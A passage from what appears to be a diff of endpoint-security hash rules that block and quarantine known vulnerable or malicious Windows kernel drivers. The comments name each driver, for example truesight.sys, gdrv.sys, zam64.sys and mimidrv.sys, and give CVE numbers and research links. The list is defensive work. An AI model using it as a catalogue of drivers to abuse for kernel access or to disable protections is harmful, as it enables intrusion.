+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6a0c75a6-5a18-5412-bb1a-3eaff32ad9fe",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.152236Z",
+ "creation_date": "2026-03-23T11:45:31.152238Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.152247Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ab93eb13a7362324b0d89549505c747b572382d363ee9c89418a671a56342811",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6a24fff6-a7c5-51a3-8301-d792efccc7bf",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.453724Z",
+ "creation_date": "2026-03-23T11:45:30.453727Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.453736Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "00e341c11664a6330122830344bce02aab886143bcaf8f642ab8abc57d80f1e3",
+ "comment": "Vulnerable Kernel Driver (aka nicm.sys) [https://www.loldrivers.io/drivers/86cff0de-2536-4b8d-a846-a7312c569597/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6a2fa299-1c5c-5eda-a779-3d3e6dff2041",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.143861Z",
+ "creation_date": "2026-03-23T11:45:31.143863Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.143881Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d6c0cce3aef9b8ee4a8323818434c67b1563096ec46738b7475027d582c2b11b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6a4ab4c6-344c-5033-928e-c609b0e31a25",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.622349Z",
+ "creation_date": "2026-03-23T11:45:29.622351Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.622356Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "72288d4978ee87ea6c8b1566dbd906107357087cef7364fb3dd1e1896d00baeb",
+ "comment": "PassMark vulnerable driver (aka DirectIo32.sys and DirectIo64.sys) [CVE-2020-15479] [https://github.com/eset/vulnerability-disclosures/blob/master/CVE-2020-15479/CVE-2020-15479.md] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6a53ba09-626e-5d84-95ef-d6c1c68b39d8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.475827Z",
+ "creation_date": "2026-03-23T11:45:30.475831Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.475839Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "00c02901472d74e8276743c847b8148be3799b0e3037c1dfdca21fa81ad4b922",
+ "comment": "Vulnerable Kernel Driver (aka libnicm.sys) [https://www.loldrivers.io/drivers/2b949a0d-939f-456a-a34f-4589d7712227/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6a56ce7a-0600-5b8f-9eef-5e482e6b45ca",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.810398Z",
+ "creation_date": "2026-03-23T11:45:31.810400Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.810405Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8b0e6af5764304da088fd609f86da118fbc1372381b5701b907f83400ca69e94",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6a59d775-fe31-5e57-a7e1-44b24dd0f624",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.468107Z",
+ "creation_date": "2026-03-23T11:45:30.468111Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.468120Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "db7a15aa5b85845831dcdcebf837b22cf43fa572dd9cb0bb0d264af519b8d406",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6a5aeb6a-9beb-5e91-9d3f-0eaf0af44aea",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.493653Z",
+ "creation_date": "2026-03-23T11:45:31.493657Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.493665Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f868341ee5cb31b1c8d61d246b0c2745fca5a571186fae4ae724837059c32df8",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6a5c110c-7065-518c-9d85-e301b54f24b4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.154024Z",
+ "creation_date": "2026-03-23T11:45:31.154026Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.154031Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ad27a4b2ac4df42b49b935e71da004afc7ac7b2779050e2a3b778da1e840a941",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6a60ba86-44b0-5b78-b2e5-2dd3df95fdd6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.973844Z",
+ "creation_date": "2026-03-23T11:45:29.973846Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.973852Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "97b32ddf83f75637e3ba934df117081dd6a1c57d47a4c9700d35e736da11d5bd",
+ "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6a666cee-2bbc-51ba-932f-f57c86e0c592",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.621390Z",
+ "creation_date": "2026-03-23T11:45:29.621391Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.621397Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5ae23f1fcf3fb735fcf1fa27f27e610d9945d668a149c7b7b0c84ffd6409d99a",
+ "comment": "ASUSTeK GPU vulnerable physmem driver (aka AsIO2_64.sys) [https://syscall.eu/blog/2020/03/30/asus_gio/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6a6db6d4-b17f-59da-b379-25f08c28a210",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.487808Z",
+ "creation_date": "2026-03-23T11:45:31.487810Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.487815Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "39326a1bcb6a96dabcb9dfb519f880680eb39f35ea495618637952507c6dbfec",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6a71118a-9d04-564d-a915-11bc0f4e7c42",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.827774Z",
+ "creation_date": "2026-03-23T11:45:31.827777Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.827786Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "78f415efdf3a409abd1d45320264bde4a1862f56d1cb9216f3e2f9a2d7171809",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6a77e505-957c-5c2d-9cdd-96065b21bc3c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.146727Z",
+ "creation_date": "2026-03-23T11:45:32.146729Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.146735Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c5400ae731464079590aad494bcf2e0799bb4281ea49baa9580ab2f1ee207861",
+ "comment": "Vulnerable Kernel Driver (aka ACPIx86.sys) [https://www.loldrivers.io/drivers/fd6c52b1-aeaa-4d89-8051-91acc68c3270/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6a7a98f8-e3bf-50a9-ae75-22ca4a7206de",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.971579Z",
+ "creation_date": "2026-03-23T11:45:29.971581Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.971586Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "de99cea1cb680816afa10d2629a8067af1dc289d2d162a21b9dba71eb0e47745",
+ "comment": "MalwareFox AntiMalware Vulnerable Driver (aka zam64.sys and zam32.sys) [CVE-2021-31727, CVE-2021-31728] [https://www.loldrivers.io/drivers/e5f12b82-8d07-474e-9587-8c7b3714d60c/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6a7b0d5a-1f35-5d7c-bcd7-b4a6653164a7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.808631Z",
+ "creation_date": "2026-03-23T11:45:31.808633Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.808639Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8fdc7fe94185ea96f4af7a513d7644ec9cb66cce3207358cbd8dc330caf7bc85",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6a7b29ef-b663-5cf5-b3da-4fc999013779",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.615849Z",
+ "creation_date": "2026-03-23T11:45:29.615851Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.615857Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2e5648f892460e2a2a450519b523007ca6973a3679a59c07582aa5bdbd6584d4",
+ "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6a8cdd55-f402-5fef-9d29-26b4ab762e66",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.823682Z",
+ "creation_date": "2026-03-23T11:45:30.823684Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.823690Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7acc162be849c4f95d8d74c3f5aa97681c62406f604bdc5e3cf4d9993dcfcc80",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6aa4fec8-482e-59e2-b1a8-082a6b9960c2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.967530Z",
+ "creation_date": "2026-03-23T11:45:29.967532Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.967538Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d64f906376f21677d0585e93dae8b36248f94be7091b01fd1d4381916a326afe",
+ "comment": "Retliften malicious signed drivers (aka netfilter.sys) [https://msrc-blog.microsoft.com/2021/06/25/investigating-and-mitigating-malicious-drivers/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6aaa0071-6503-50ed-b481-ac5658890a6a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.609540Z",
+ "creation_date": "2026-03-23T11:45:29.609541Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.609547Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b5433ec27586bdd8d2ef606f9212d8ed75ae3ae2e201a1acaf325d9b12239df8",
+ "comment": "Gigabyte vulnerable driver (aka gdrv.sys) [CVE-2018-19320] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6aab1a7b-6d25-57a3-b4d4-18edb5bd340d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.609041Z",
+ "creation_date": "2026-03-23T11:45:29.609043Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.609048Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "17927b93b2d6ab4271c158f039cae2d60591d6a14458f5a5690aec86f5d54229",
+ "comment": "Gigabyte vulnerable driver (aka gdrv.sys) [CVE-2018-19320] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6aac6845-a0b9-5b58-90ab-518a73c39e9a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.487558Z",
+ "creation_date": "2026-03-23T11:45:31.487560Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.487566Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "34a49a7c6263fab5bb04eca3a281865480cc26183b4a09aa27f54948e9b3f211",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6aae14c1-b24d-54ab-83dc-4f746eaf28f7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
